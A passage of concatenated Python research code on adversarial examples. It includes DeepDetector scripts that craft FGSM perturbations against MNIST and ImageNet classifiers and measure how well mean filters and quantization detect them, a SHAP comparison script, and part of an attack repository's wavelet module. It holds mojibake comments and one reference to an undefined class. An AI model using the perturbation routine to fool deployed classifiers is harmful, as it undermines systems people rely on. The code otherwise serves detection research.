currentAdvXLabel = model_argmax(sess,x,predictions,adv_x[i:(i+1)])
currentAdvXProbList = my_model_argmax(sess,x,predictions,adv_x[i:(i+1)])
advPreTimeEnd = time.time()
advPreTime = advPreTimeEnd-advPreTimeStart
if currentAdvXLabel == currentXLabel:
disturbed_failure_number+=1
continue
# fig = plt.figure('test')
# picOne = fig.add_subplot(121)
# picOne.imshow(X_test[i+5500:(i+5501)].reshape((28,28)), cmap='gray')
# picTwo = fig.add_subplot(122)
# picTwo.imshow(adv_x[i:(i+1)].reshape((28,28)), cmap='gray')
# plt.show()
test_number+=1
print('probabilities = %.4f ; %.4f'%(currentXProbList[currentXLabel],currentAdvXProbList[currentAdvXLabel]))
tempX = np.reshape(X_test[i+5500:(i+5501)], (28,28))
test_x = np.array(tempX)
oriFilteredPreTimeStart = time.time()
currentX = np.reshape(X_test[i+5500:(i+5501)], (28,28))
imageEntropy = oneDEntropy(test_x)
if imageEntropy < 4:
current_x_res = scalarQuantization(currentX, 128)
elif imageEntropy < 5:
current_x_res = scalarQuantization(currentX, 64)
else:
current_x_ASQ = scalarQuantization(currentX, 43)
current_x_ASQ_AMF = crossMeanFilterOperations(current_x_ASQ,3,25,13)
current_x_res = chooseCloserFilter(currentX, current_x_ASQ, current_x_ASQ_AMF)
current_x_res = np.reshape(current_x_res, X_test[0:1].shape)
current_x_res_label = model_argmax(sess,x,predictions,current_x_res)
current_x_res_prob = my_model_argmax(sess,x,predictions,current_x_res)
tempX2 = np.reshape(adv_x[i:(i+1)], (28,28))
test_adv_x = np.array(tempX2)
currentAdvX = np.reshape(adv_x[i:(i+1)], (28,28))
imageEntropy2 = oneDEntropy(test_adv_x)
print('%d: %.2f------%.2f' % (i, imageEntropy,imageEntropy2))
if imageEntropy2 < 4:
current_adv_x_res = scalarQuantization(currentAdvX,128)
elif imageEntropy2 < 5:
current_adv_x_res = scalarQuantization(currentAdvX, 64)
else:
current_adv_x_ASQ = scalarQuantization(currentAdvX, 43)
current_adv_x_ASQ_AMF = crossMeanFilterOperations(current_adv_x_ASQ,3,25,13)
current_adv_x_res = chooseCloserFilter(currentAdvX, current_adv_x_ASQ, current_adv_x_ASQ_AMF)
current_adv_x_res = np.reshape(current_adv_x_res, X_test[0:1].shape)
current_adv_x_res_label = model_argmax(sess,x,predictions,current_adv_x_res)
current_adv_x_res_prob = my_model_argmax(sess,x,predictions,current_adv_x_res)
print('filtered Probs = %.4f ; %.4f'%(current_x_res_prob[current_x_res_label],current_adv_x_res_prob[current_adv_x_res_label]))
if current_adv_x_res_label != currentAdvXLabel:
TP+=1
if current_adv_x_res_label == current_class:
TTP+=1
else:
FN+=1
if current_x_res_label != currentXLabel:
FP+=1
str1 = '%d-%d-%d: TP = %d; FN = %d; FP = %d; TTP = %d' % (test_number,original_classified_wrong_number,disturbed_failure_number,TP,FN,FP,TTP)
print(str1)
Recall = TP/(TP+FN)
Precision = TP/(TP+FP)
tempStarStr = '********************************************************'
recallStr = 'Recall = %.4f' % (Recall)
precisionStr = 'Precision = %.4f' % (Precision)
print(tempStarStr)
print(recallStr)
print(precisionStr)
print(tempStarStr)
# In[4]:
def main(argv=None):
mnist_tutorial(nb_epochs=FLAGS.nb_epochs,
batch_size=FLAGS.batch_size,
learning_rate=FLAGS.learning_rate,
train_dir=FLAGS.train_dir,
filename=FLAGS.filename,
load_model=FLAGS.load_model)
if __name__ == '__main__':
flags.DEFINE_integer('nb_epochs', 6, 'Number of epochs to train model')
flags.DEFINE_integer('batch_size', 128, 'Size of training batches')
flags.DEFINE_float('learning_rate', 0.001, 'Learning rate for training')
flags.DEFINE_string('train_dir', '/tmp', 'Directory where to save model.')
flags.DEFINE_string('filename', 'mnist.ckpt', 'Checkpoint filename.')
flags.DEFINE_boolean('load_model', True, 'Load saved model or train.')
tf.app.run()
```
#### File: DeepDetector-master/Train/Train_FGSM_ImageNet.py
```python
import sys
caffe_root = '/home/ll/caffe'
sys.path.insert(0, caffe_root + '/python')
import matplotlib.mlab as mlab
import scipy.integrate as integrate
from PIL import Image
from scipy import fft
from scipy import misc
from skimage import transform
import shutil
import requests
import tempfile
import os
import math
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
get_ipython().run_line_magic('matplotlib', 'inline')
import time
import caffe
plt.rcParams['figure.figsize'] = (4, 4)
plt.rcParams['image.interpolation'] = 'nearest'
plt.rcParams['image.cmap'] = 'gray'
# In[2]:
def load_model():
BATCH_SIZE = 1
model_def = './bvlc_googlenet/deploy.prototxt'
net_weights = './bvlc_googlenet/bvlc_googlenet.caffemodel'
net = caffe.Net(model_def, net_weights, caffe.TEST)
shape = list(net.blobs['data'].data.shape)
shape[0] = BATCH_SIZE
net.blobs['data'].reshape(*shape)
net.blobs['prob'].reshape(BATCH_SIZE, )
net.reshape()
return net
def compute_gradient(image, intended_outcome):
predict(image, display_output=False)
probs = np.zeros_like(net.blobs['prob'].data)
probs[0][intended_outcome] = -1
gradient = net.backward(prob=probs)
return gradient['data'].copy()
def display(data):
plt.imshow(transformer.deprocess('data', data))
def get_label_name(num):
options = labels[num].split(',')
# remove the tag
options[0] = ' '.join(options[0].split(' ')[1:])
return ','.join(options[:2])
def predict(data, n_preds=6, display_output=False):
net.blobs['data'].data[...] = data
if display_output:
display(data)
prob = net.forward()['prob']
probs = prob[0]
prediction = probs.argmax()
top_k = probs.argsort()[::-1]
for pred in top_k[:n_preds]:
percent = round(probs[pred] * 100, 2)
# display it compactly if we're displaying more than the top prediction
pred_formatted = "%03d" % pred
if n_preds == 1:
format_string = "label: {cls} ({label})\ncertainty: {certainty}%"
else:
format_string = "label: {cls} ({label}), certainty: {certainty}%"
if display_output:
print format_string.format(
cls=pred_formatted, label=get_label_name(pred), certainty=percent)
return prob
def add_matrix(image_data,offset,ratio):
result_data=np.zeros_like(image_data)
for x in range(1):
for y in range(3):
for z in range(224):
for v in range(224):
result_data[y][z][v]=image_data[y][z][v]+ratio*offset[x][y][z][v]
if(result_data[y][z][v]<0):
result_data[y][z][v]=0
if(result_data[y][z][v]>255):
result_data[y][z][v]=255
return result_data
# In[3]:
def normalization(image_data):
image_data[image_data<0] = 0
image_data[image_data>255] = 255.0
def boxMeanFilterOperations(inputDigit, start, end, coefficient):
retDigit = np.array(inputDigit, dtype=np.float32)
for row in xrange(start, end):
for col in xrange(start, end):
retDigit[0][row][col] = sum(sum(inputDigit[0,row-start:row+start+1,col-start:col+start+1]))/coefficient
retDigit[1][row][col] = sum(sum(inputDigit[1,row-start:row+start+1,col-start:col+start+1]))/coefficient
retDigit[2][row][col] = sum(sum(inputDigit[2,row-start:row+start+1,col-start:col+start+1]))/coefficient
return retDigit
def diamondMeanFilterOperations(inputDigit, kernel, start, end, coefficient):
retDigit = np.array(inputDigit, dtype=np.float32)
for row in xrange(start, end):
for col in xrange(start, end):
retDigit[0][row][col] = sum(sum(inputDigit[0,row-start:row+start+1, col-start:col+start+1]*kernel))/coefficient
retDigit[1][row][col] = sum(sum(inputDigit[1,row-start:row+start+1, col-start:col+start+1]*kernel))/coefficient
retDigit[2][row][col] = sum(sum(inputDigit[2,row-start:row+start+1, col-start:col+start+1]*kernel))/coefficient
return retDigit
def crossMeanFilterOperations(inputDigit, start, end, coefficient):
retDigit = np.array(inputDigit, dtype=np.float32)
for row in xrange(start, end):
for col in xrange(start, end):
temp0 = inputDigit[0][row][col]
temp1 = inputDigit[1][row][col]
temp2 = inputDigit[2][row][col]
for i in range(1,start+1):
temp0+=inputDigit[0][row-i][col]
temp0+=inputDigit[0][row+i][col]
temp0+=inputDigit[0][row][col-i]
temp0+=inputDigit[0][row][col+i]
temp1+=inputDigit[1][row-i][col]
temp1+=inputDigit[1][row+i][col]
temp1+=inputDigit[1][row][col-i]
temp1+=inputDigit[1][row][col+i]
temp2+=inputDigit[2][row-i][col]
temp2+=inputDigit[2][row+i][col]
temp2+=inputDigit[2][row][col-i]
temp2+=inputDigit[2][row][col+i]
retDigit[0][row][col] = temp0/coefficient
retDigit[1][row][col] = temp1/coefficient
retDigit[2][row][col] = temp2/coefficient
return retDigit
def scalarQuantization(inputDigit, interval, left=True):
retDigit = np.array(inputDigit,dtype=np.float32)
retDigit//=interval
retDigit*=interval
if not left:
halfInterval = interval//2
retDigit+=(halfInterval)
return retDigit
# In[4]:
def trainBoxMeanFilters(rootDir,true_class):
print(rootDir)
for kernelSize in xrange(3,10,2):
startTime = time.time()
print('box filter, size = ', kernelSize)
original_classified_wrong_number = 0
disturbed_failure_number = 0
Total=TTP=TP=FP=FN=0
start = (kernelSize-1)//2
end = 224-start
coefficient = kernelSize**2
list_dirs = os.walk(rootDir)
for root, dirs, files in list_dirs:
for f in files:
original_data=transformer.preprocess('data', caffe.io.load_image(os.path.join(root, f)))
net.blobs['data'].data[...] = original_data
ori_out = net.forward()
pred_class = ori_out['prob'][0].argmax()
if pred_class != true_class:
original_classified_wrong_number+=1
continue
grad = compute_gradient(original_data, pred_class)
delta = np.sign(grad)
adversarial_data=add_matrix(original_data,delta,1.0)
normalization(adversarial_data)
net.blobs['data'].data[...] = adversarial_data
adv_out = net.forward()
adv_class = adv_out['prob'][0].argmax()
if adv_class == true_class:
disturbed_failure_number+=1
continue
Total+=1
ori_processed = boxMeanFilterOperations(original_data, start, end, coefficient)
net.blobs['data'].data[...] = ori_processed
ori_filtered_out = net.forward()
ori_filtered_class = ori_filtered_out['prob'][0].argmax()
adv_processed = boxMeanFilterOperations(adversarial_data, start, end, coefficient)
net.blobs['data'].data[...] = adv_processed
adv_filtered_out = net.forward()
adv_filtered_class = adv_filtered_out['prob'][0].argmax()
if(ori_filtered_class!=true_class):
FP+=1
if (adv_filtered_class!=adv_class):
TP+=1
if (adv_filtered_class == true_class):
TTP+=1
else:
FN+=1
print("Overall results: ")
str1 = '%d-%d-%d: TP = %d; FN = %d; FP = %d; TTP = %d' % (Total,original_classified_wrong_number,disturbed_failure_number,TP,FN,FP,TTP)
print(str1)
endTime = time.time()
print('lasting ', endTime-startTime, 'seconds')
Recall=TP*1.0/(TP+FN)
Precision=TP*1.0/(TP+FP)
print('********************************')
print ("Recall: ",Recall)
print ("Precision: ",Precision)
print('********************************')
# In[5]:
def trainDiamondMeanFilters(rootDir,true_class,diamonds):
print(rootDir)
coefficient = [5,13, 25, 41]
kernelIndex = -1
for kernelSize in xrange(3,10,2):
startTime = time.time()
print('diamond filter, size = ', kernelSize)
original_classified_wrong_number = 0
disturbed_failure_number = 0
Total=TTP=TP=FP=FN=0
start = (kernelSize-1)//2
end = 224-start
kernelIndex+=1
list_dirs = os.walk(rootDir)
for root, dirs, files in list_dirs:
for f in files:
original_data=transformer.preprocess('data', caffe.io.load_image(os.path.join(root, f)))
net.blobs['data'].data[...] = original_data
ori_out = net.forward()
pred_class = ori_out['prob'][0].argmax()
if pred_class != true_class:
original_classified_wrong_number+=1
continue
grad = compute_gradient(original_data, pred_class)
delta = np.sign(grad)
adversarial_data=add_matrix(original_data,delta,1.0)
normalization(adversarial_data)
net.blobs['data'].data[...] = adversarial_data
adv_out = net.forward()
adv_class = adv_out['prob'][0].argmax()
if adv_class == true_class:
disturbed_failure_number+=1
continue
Total+=1
ori_processed = diamondMeanFilterOperations(original_data, diamonds[kernelIndex], start, end, coefficient[kernelIndex])
net.blobs['data'].data[...] = ori_processed
ori_filtered_out = net.forward()
ori_filtered_class = ori_filtered_out['prob'][0].argmax()
adv_processed = diamondMeanFilterOperations(adversarial_data, diamonds[kernelIndex], start, end, coefficient[kernelIndex])
net.blobs['data'].data[...] = adv_processed
adv_filtered_out = net.forward()
adv_filtered_class = adv_filtered_out['prob'][0].argmax()
if(ori_filtered_class!=true_class):#FP
FP+=1
if (adv_filtered_class!=adv_class):
TP+=1
if (adv_filtered_class == true_class):
TTP+=1
else:
FN+=1
print("Overall results: ")
str1 = '%d-%d-%d: TP = %d; FN = %d; FP = %d; TTP = %d' % (Total,original_classified_wrong_number,disturbed_failure_number,TP,FN,FP,TTP)
print(str1)
endTime = time.time()
print('lasting ', endTime-startTime, 'seconds')
Recall=TP*1.0/(TP+FN)
Precision=TP*1.0/(TP+FP)
print('********************************')
print ("Recall: ",Recall)
print ("Precision: ",Precision)
print('********************************')
# In[6]:
def trainCrossMeanFilters(rootDir,true_class):
print(rootDir)
coefficient = [5,9, 13, 17]
kernelIndex = -1
for kernelSize in xrange(3,10,2):
startTime = time.time()
print('cross filter, size = ', kernelSize)
list_dirs = os.walk(rootDir)
original_classified_wrong_number = 0
disturbed_failure_number = 0
Total=TTP=TP=FP=FN=0
start = (kernelSize-1)//2
end = 224-start
kernelIndex+=1
for root, dirs, files in list_dirs:
for f in files:
original_data=transformer.preprocess('data', caffe.io.load_image(os.path.join(root, f)))
net.blobs['data'].data[...] = original_data
ori_out = net.forward()
pred_class = ori_out['prob'][0].argmax()
if pred_class != true_class:
original_classified_wrong_number+=1
continue
grad = compute_gradient(original_data, pred_class)
delta = np.sign(grad)
adversarial_data=add_matrix(original_data,delta,1.0)
normalization(adversarial_data)
net.blobs['data'].data[...] = adversarial_data
adv_out = net.forward()
adv_class = adv_out['prob'][0].argmax()
if adv_class == true_class:
disturbed_failure_number+=1
continue
Total+=1
ori_processed = crossMeanFilterOperations(original_data, start, end, coefficient[kernelIndex])
net.blobs['data'].data[...] = ori_processed
ori_filtered_out = net.forward()
ori_filtered_class = ori_filtered_out['prob'][0].argmax()
adv_processed = crossMeanFilterOperations(adversarial_data, start, end, coefficient[kernelIndex])
net.blobs['data'].data[...] = adv_processed
adv_filtered_out = net.forward()
adv_filtered_class = adv_filtered_out['prob'][0].argmax()
if(ori_filtered_class!=true_class):#FP
FP+=1
if (adv_filtered_class!=adv_class):
TP+=1
if (adv_filtered_class == true_class):
TTP+=1
else:
FN+=1
print("Overall results: ")
str1 = '%d-%d-%d: TP = %d; FN = %d; FP = %d; TTP = %d' % (Total,original_classified_wrong_number,disturbed_failure_number,TP,FN,FP,TTP)
print(str1)
endTime = time.time()
print('lasting ', endTime-startTime, 'seconds')
Recall=TP*1.0/(TP+FN)
Precision=TP*1.0/(TP+FP)
print('********************************')
print ("Recall: ",Recall)
print ("Precision: ",Precision)
print('********************************')
# In[10]:
def trainScalarQuantization(rootDir,true_class,left=True):
print(rootDir)
intervals = [128,85,64,51,43,37,32,28,26]
for intervalIndex in range(9):
startTime = time.time()
print('NBinterval = ', intervalIndex+2, '; interval size = ', intervals[intervalIndex])
list_dirs = os.walk(rootDir)
original_classified_wrong_number = 0
disturbed_failure_number = 0
Total=TTP=TP=FP=FN=0
for root, dirs, files in list_dirs:
for f in files:
original_data=transformer.preprocess('data', caffe.io.load_image(os.path.join(root, f)))
net.blobs['data'].data[...] = original_data
ori_out = net.forward()
pred_class = ori_out['prob'][0].argmax()
if pred_class != true_class:
original_classified_wrong_number+=1
continue
grad = compute_gradient(original_data, pred_class)
delta = np.sign(grad)
adversarial_data=add_matrix(original_data,delta,1.0)
normalization(adversarial_data)
net.blobs['data'].data[...] = adversarial_data
adv_out = net.forward()
adv_class = adv_out['prob'][0].argmax()
if adv_class == true_class:
disturbed_failure_number+=1
continue
Total+=1
ori_processed = scalarQuantization(original_data, intervals[intervalIndex], left=left)
net.blobs['data'].data[...] = ori_processed
ori_filtered_out = net.forward()
ori_filtered_class = ori_filtered_out['prob'][0].argmax()
adv_processed = scalarQuantization(adversarial_data, intervals[intervalIndex], left=left)
net.blobs['data'].data[...] = adv_processed
adv_filtered_out = net.forward()
adv_filtered_class = adv_filtered_out['prob'][0].argmax()
if(ori_filtered_class!=true_class):
FP+=1
if (adv_filtered_class!=adv_class):
TP+=1
if (adv_filtered_class == true_class):
TTP+=1
else:
FN+=1
print("Overall results: ")
str1 = '%d-%d-%d: TP = %d; FN = %d; FP = %d; TTP = %d' % (Total,original_classified_wrong_number,disturbed_failure_number,TP,FN,FP,TTP)
print(str1)
endTime = time.time()
print('lasting ', endTime-startTime, 'seconds')
Recall=TP*1.0/(TP+FN)
Precision=TP*1.0/(TP+FP)
print('********************************')
print ("Recall: ",Recall)
print ("Precision: ",Precision)
print('********************************')
# In[11]:
caffe.set_mode_gpu()
net = load_model()
transformer = caffe.io.Transformer({'data': net.blobs['data'].data.shape})
transformer.set_transpose('data', (2,0,1))
transformer.set_raw_scale('data', 255) #images in [0,255] range instead of [0,1]
transformer.set_channel_swap('data', (2,1,0)) #channels in BGR order instead of RGB
diamonds = [np.array([[0,1,0],[1,1,1],[0,1,0]]), np.array([[0,0,1,0,0],[0,1,1,1,0],[1,1,1,1,1],[0,1,1,1,0],[0,0,1,0,0]]),
np.array([[0,0,0,1,0,0,0],[0,0,1,1,1,0,0],[0,1,1,1,1,1,0],[1,1,1,1,1,1,1],[0,1,1,1,1,1,0],[0,0,1,1,1,0,0],[0,0,0,1,0,0,0]]),
np.array([[0,0,0,0,1,0,0,0,0],[0,0,0,1,1,1,0,0,0],[0,0,1,1,1,1,1,0,0],[0,1,1,1,1,1,1,1,0],[1,1,1,1,1,1,1,1,1],[0,1,1,1,1,1,1,1,0],[0,0,1,1,1,1,1,0,0],[0,0,0,1,1,1,0,0,0],[0,0,0,0,1,0,0,0,0],])]
imageDirs = ['/home/ll/DeepDetector/TestImagenet/Goldfish','/home/ll/DeepDetector/TestImagenet/Clock',
'/home/ll/DeepDetector/TestImagenet/Pineapple']
imageLabels = [1,530,953]
# In[ ]:
for i in range(3):
trainBoxMeanFilters(imageDirs[i],imageLabels[i])
trainDiamondMeanFilters(imageDirs[i],imageLabels[i],diamonds)
trainCrossMeanFilters(imageDirs[i],imageLabels[i])
# In[ ]:
for i in range(3):
trainScalarQuantization(imageDirs[i],imageLabels[i])
trainScalarQuantization(imageDirs[i],imageLabels[i],left=False)
```
#### File: adaptive-jpeg-compression/remove_code/shap_compare_adv.py
```python
import os
import sys
# import matplotlib.pyplot as plt
import numpy as np
# import sys
import xlwt
import shutil
sys.path.append('../common_code')
# from img_ploter import img_ploter
# sys.path.append('../common_code')
import general as g
def read_shap(file_name):
shap_all=np.loadtxt(file_name)
del_idx = np.argwhere(np.all(shap_all[..., :] == 0, axis=1))
shap_del = np.delete(shap_all, del_idx, axis=0)
shap_bin=(shap_del>0)*1
flag_norm = 0
if 1 == flag_norm:
shap_show = shap_del/np.sum(shap_del,axis=1).reshape(-1,1)
else:
shap_show = shap_del
return shap_show,shap_bin
def read_attr(file_name):
attr=np.loadtxt(file_name)
attr[3]=attr[3]*100
return attr[3:6]
def write_xls_col(data,legends,saved_name):
exl=xlwt.Workbook()
exl_sheet=exl.add_sheet('data')
for i in range(len(data)):
exl_sheet.write(0,2*i,'Importance')
exl_sheet.write(0,2*i+1,'error')
data_now = data[i].mean(axis=0).astype(np.float64)
std_now = data[i].std(axis=0).astype(np.float64)
names = legends[i].split('_')
for j in range(len(names)):
exl_sheet.write(j+1,2*i,names[j])
for j in range(len(data_now)):
exl_sheet.write(j+len(names)+1,2*i,data_now[j])
exl_sheet.write(j+len(names)+1,2*i+1,std_now[j])
exl.save('temp.xls')
shutil.move('temp.xls',saved_name)
return exl,exl_sheet
def write_xls_num(data,legends,saved_name):
exl=xlwt.Workbook()
exl_sheet=exl.add_sheet('data')
for i in range(len(data)):
exl_sheet.write(0,2*i,'num')
exl_sheet.write(0,2*i+1,'error')
data_now = data[i].sum(axis=0).astype(np.float64)/data[i].shape[0]
std_now = np.zeros_like(data_now)
names = legends[i].split('_')
for j in range(len(names)):
exl_sheet.write(j+1,2*i,names[j])
for j in range(len(data_now)):
exl_sheet.write(j+len(names)+1,2*i,data_now[j])
exl_sheet.write(j+len(names)+1,2*i+1,std_now[j])
exl.save('temp.xls')
shutil.move('temp.xls',saved_name)
return exl,exl_sheet
def read_shap_single(file_name):
shap_all = np.loadtxt(file_name)
del_idx = np.argwhere(np.all(shap_all[..., :] == 0, axis=1))
shap_del = np.delete(shap_all, del_idx, axis=0)
flag_norm = 1
if 1 == flag_norm:
shap_show = shap_del/np.sum(shap_del,axis=1).reshape(-1,1)
else:
shap_show = shap_del
return shap_show
def read_shap_batch(saved_dir,method,players):
model_num=len(method)
shap_all=np.zeros((model_num,players))
for i in range(model_num):
shap_now = read_shap_single(os.path.join(saved_dir,method[i],'shap_all.txt'))
# shap_all.append(shap_now.mean(axis=0).reshape(1,8))
shap_all[i,:]=shap_now.mean(axis=0).reshape(1,players)
return shap_all
def read_pecp_single(file_name):
nums = np.loadtxt(file_name)
pecp = np.array((nums[4],nums[5]))
return pecp
def read_pecp_batch(saved_dir,method,players):
model_num=len(method)
pecp_num=2
pecp_all=np.zeros((model_num,pecp_num))
for i in range(model_num):
pecp = read_pecp_single(os.path.join(saved_dir,method[i],'nums.txt'))
pecp_all[i,:]=pecp.reshape(1,pecp_num)
return pecp_all
# ่พๅ
ฅ
# saved_dir = sys.argv[1]
# model = [sys.argv[2]]
saved_dir='../saved_tests/img_shap'
model=['allconv']
att_method=['FGSM_L2_IDP','PGD_L2_IDP','CW_L2_IDP','Deepfool_L2_IDP',
'FGSM_Linf_IDP','PGD_Linf_IDP','CW_Linf_IDP',
'FGSM_L2_UAP','PGD_L2_UAP','CW_L2_UAP','Deepfool_L2_UAP',]
eps_L2=['0.1','0.5','1.0','10.0','100.0']
eps_Linf=['0.005','0.01','0.1','1.0','10.0']
if 'imagenet' in model[0]:
fft_level=g.levels_all_imagenet
else:
fft_level=g.levels_all_cifar
'''
ๆฏ่พๆๆๅทฅๅต
'''
shap_show_all=[]
shap_bin_all=[]
legends=[]
for i in range(len(model)):
for j in range(len(att_method)):
if 'L2' in att_method[j]:
eps = eps_L2
else:
eps=eps_Linf
if 'CW_L2_IDP' in att_method[j]:
eps = [eps[0]]
if 'Deepfool_L2_IDP' in att_method[j]:
eps = [eps[0]]
for k in range(len(eps)):
dir_name=model[i]+'_'+att_method[j]+'_'+eps[k]
file_name=os.path.join(saved_dir,dir_name,'shap_all.txt')
if os.path.exists(file_name):
shap_show,shap_bin_now = read_shap(file_name)
else:
print('Not exist %s'%file_name)
shap_show= np.zeros([1,fft_level])
shap_bin_now=np.zeros([1,fft_level])
# attr=read_attr(os.path.join(saved_dir,dir_name,'nums.txt'))
shap_show_all.append(shap_show)
shap_bin_all.append(shap_bin_now)
legends.append(dir_name)
write_xls_col(shap_show_all,legends,os.path.join(saved_dir,model[i]+'_shap_all.xls'))
write_xls_num(shap_bin_all,legends,os.path.join(saved_dir,model[i]+'_shap_bin_all.xls'))
```
#### File: SSAH-adversarial-attack-main/attack/DWT.py
```python
import torch
from torch.autograd import Function
import pywt
import numpy as np
import math
from torch.nn import Module
class DWTFunction_2D_tiny(Function):
@staticmethod
def forward(ctx, input, matrix_Low_0, matrix_Low_1, matrix_High_0, matrix_High_1):
ctx.save_for_backward(matrix_Low_0, matrix_Low_1, matrix_High_0, matrix_High_1)
L = torch.matmul(matrix_Low_0, input)
LL = torch.matmul(L, matrix_Low_1)
return LL
@staticmethod
def backward(ctx, grad_LL):
matrix_Low_0, matrix_Low_1, matrix_High_0, matrix_High_1 = ctx.saved_variables
grad_L = torch.matmul(grad_LL, matrix_Low_1.t())
grad_input = torch.matmul(matrix_Low_0.t(), grad_L)
return grad_input, None, None, None, None
class IDWT_2D_tiny(Module):
"""
input: lfc -- (N, C, H/2, W/2)
hfc_lh -- (N, C, H/2, W/2)
hfc_hl -- (N, C, H/2, W/2)
hfc_hh -- (N, C, H/2, W/2)
output: the original 2D data -- (N, C, H, W)
"""
def __init__(self, wavename):
"""
2D inverse DWT (IDWT) for 2D image reconstruction
:param wavename: pywt.wavelist(); in the paper, 'chx.y' denotes 'biorx.y'.
"""
super(IDWT_2D_tiny, self).__init__()
wavelet = pywt.Wavelet(wavename)
self.band_low = wavelet.dec_lo
self.band_low.reverse()
self.band_high = wavelet.dec_hi
self.band_high.reverse()
assert len(self.band_low) == len(self.band_high)
self.band_length = len(self.band_low)
assert self.band_length % 2 == 0
self.band_length_half = math.floor(self.band_length / 2)
def get_matrix(self):
"""
้ข็ธๅ้ๆจปๅดฒ้ญโ
ๆจ
generating the matrices: \mathcal{L}, \mathcal{H}
:return: self.matrix_low = \mathcal{L}, self.matrix_high = \mathcal{H}
"""
L1 = np.max((self.input_height, self.input_width))
L = math.floor(L1 / 2)
matrix_h = np.zeros((L, L1 + self.band_length - 2))
matrix_g = np.zeros((L1 - L, L1 + self.band_length - 2))
end = None if self.band_length_half == 1 else (-self.band_length_half + 1)
index = 0
for i in range(L):
for j in range(self.band_length):
matrix_h[i, index + j] = self.band_low[j]
index += 2
matrix_h_0 = matrix_h[0:(math.floor(self.input_height / 2)), 0:(self.input_height + self.band_length - 2)]
matrix_h_1 = matrix_h[0:(math.floor(self.input_width / 2)), 0:(self.input_width + self.band_length - 2)]
index = 0
for i in range(L1 - L):
for j in range(self.band_length):
matrix_g[i, index + j] = self.band_high[j]
index += 2
matrix_g_0 = matrix_g[0:(self.input_height - math.floor(self.input_height / 2)),
0:(self.input_height + self.band_length - 2)]
matrix_g_1 = matrix_g[0:(self.input_width - math.floor(self.input_width / 2)),
0:(self.input_width + self.band_length - 2)]
matrix_h_0 = matrix_h_0[:, (self.band_length_half - 1):end]
matrix_h_1 = matrix_h_1[:, (self.band_length_half - 1):end]
matrix_h_1 = np.transpose(matrix_h_1)
matrix_g_0 = matrix_g_0[:, (self.band_length_half - 1):end]
matrix_g_1 = matrix_g_1[:, (self.band_length_half - 1):end]
matrix_g_1 = np.transpose(matrix_g_1)
if torch.cuda.is_available():
self.matrix_low_0 = torch.Tensor(matrix_h_0).cuda()
self.matrix_low_1 = torch.Tensor(matrix_h_1).cuda()
self.matrix_high_0 = torch.Tensor(matrix_g_0).cuda()
self.matrix_high_1 = torch.Tensor(matrix_g_1).cuda()
else:
self.matrix_low_0 = torch.Tensor(matrix_h_0)
self.matrix_low_1 = torch.Tensor(matrix_h_1)
self.matrix_high_0 = torch.Tensor(matrix_g_0)
self.matrix_high_1 = torch.Tensor(matrix_g_1)
def forward(self, LL):
"""
recontructing the original 2D data
the original 2D data = \mathcal{L}^T * lfc * \mathcal{L}
+ \mathcal{H}^T * hfc_lh * \mathcal{L}
+ \mathcal{L}^T * hfc_hl * \mathcal{H}
+ \mathcal{H}^T * hfc_hh * \mathcal{H}
:param LL: the low-frequency component
:param LH: the high-frequency component, hfc_lh
:param HL: the high-frequency component, hfc_hl
:param HH: the high-frequency component, hfc_hh
:return: the original 2D data
"""
assert len(LL.size()) == 4
self.input_height = LL.size()[-2] * 2
self.input_width = LL.size()[-1] * 2
self.get_matrix()
return IDWTFunction_2D_tiny.apply(LL, self.matrix_low_0, self.matrix_low_1)
class DWT_2D_tiny(Module):
"""
input: the 2D data to be decomposed -- (N, C, H, W)
output -- lfc: (N, C, H/2, W/2)
#hfc_lh: (N, C, H/2, W/2)
#hfc_hl: (N, C, H/2, W/2)
#hfc_hh: (N, C, H/2, W/2)
DWT_2D_tiny only outputs the low-frequency component, which is used in WaveCNet;
the all four components could be get using DWT_2D, which is used in WaveUNet.
"""
def __init__(self, wavename):
"""
2D discrete wavelet transform (DWT) for 2D image decomposition
:param wavename: pywt.wavelist(); in the paper, 'chx.y' denotes 'biorx.y'.
"""
super(DWT_2D_tiny, self).__init__()
wavelet = pywt.Wavelet(wavename)
self.band_low = wavelet.rec_lo
# print('band_low', self.band_low, len(self.band_low)) # [1/ๆ นๅท2 = 0.707๏ผ 0.07]
self.band_high = wavelet.rec_hi
# print('band_high', self.band_high) # [0.707, -0.707]
assert len(self.band_low) == len(self.band_high)
self.band_length = len(self.band_low) # 2
assert self.band_length % 2 == 0
self.band_length_half = math.floor(self.band_length / 2)
# print('band_length_half', self.band_length_half) # 1
def get_matrix(self):
"""
็ๆๅๆข็ฉ้ต
generating the matrices: \mathcal{L}, \mathcal{H}
:return: self.matrix_low = \mathcal{L}, self.matrix_high = \mathcal{H}
"""
L1 = np.max((self.input_height, self.input_width)) # 224
L = math.floor(L1 / 2) # 112
matrix_h = np.zeros((L, L1 + self.band_length - 2)) # (112, 224 + 2 -2)
matrix_g = np.zeros((L1 - L, L1 + self.band_length - 2))
end = None if self.band_length_half == 1 else (-self.band_length_half + 1)
index = 0
for i in range(L):
for j in range(self.band_length):
matrix_h[i, index + j] = self.band_low[j]
index += 2
matrix_h_0 = matrix_h[0:(math.floor(self.input_height / 2)), 0:(self.input_height + self.band_length - 2)]
# print('matrix_h_0', matrix_h_0.shape)
matrix_h_1 = matrix_h[0:(math.floor(self.input_width / 2)), 0:(self.input_width + self.band_length - 2)]
# print('matrix_h_1', matrix_h_1.shape)
index = 0
for i in range(L1 - L):
for j in range(self.band_length):
matrix_g[i, index + j] = self.band_high[j]
index += 2
matrix_g_0 = matrix_g[0:(self.input_height - math.floor(self.input_height / 2)),
0:(self.input_height + self.band_length - 2)]
# print('matrix_g_0', matrix_g_0.shape)
matrix_g_1 = matrix_g[0:(self.input_width - math.floor(self.input_width / 2)),
0:(self.input_width + self.band_length - 2)]
# print('matrix_g_1', matrix_g_1.shape)
matrix_h_0 = matrix_h_0[:, (self.band_length_half - 1):end]
# print('matrix_h_0', matrix_h_0.shape)
matrix_h_1 = matrix_h_1[:, (self.band_length_half - 1):end]
matrix_h_1 = np.transpose(matrix_h_1)
# print('matrix_h_1', matrix_h_1.shape)
matrix_g_0 = matrix_g_0[:, (self.band_length_half - 1):end]
matrix_g_1 = matrix_g_1[:, (self.band_length_half - 1):end]
matrix_g_1 = np.transpose(matrix_g_1)
if torch.cuda.is_available():
self.matrix_low_0 = torch.Tensor(matrix_h_0).cuda()
self.matrix_low_1 = torch.Tensor(matrix_h_1).cuda()
self.matrix_high_0 = torch.Tensor(matrix_g_0).cuda()
self.matrix_high_1 = torch.Tensor(matrix_g_1).cuda()
else:
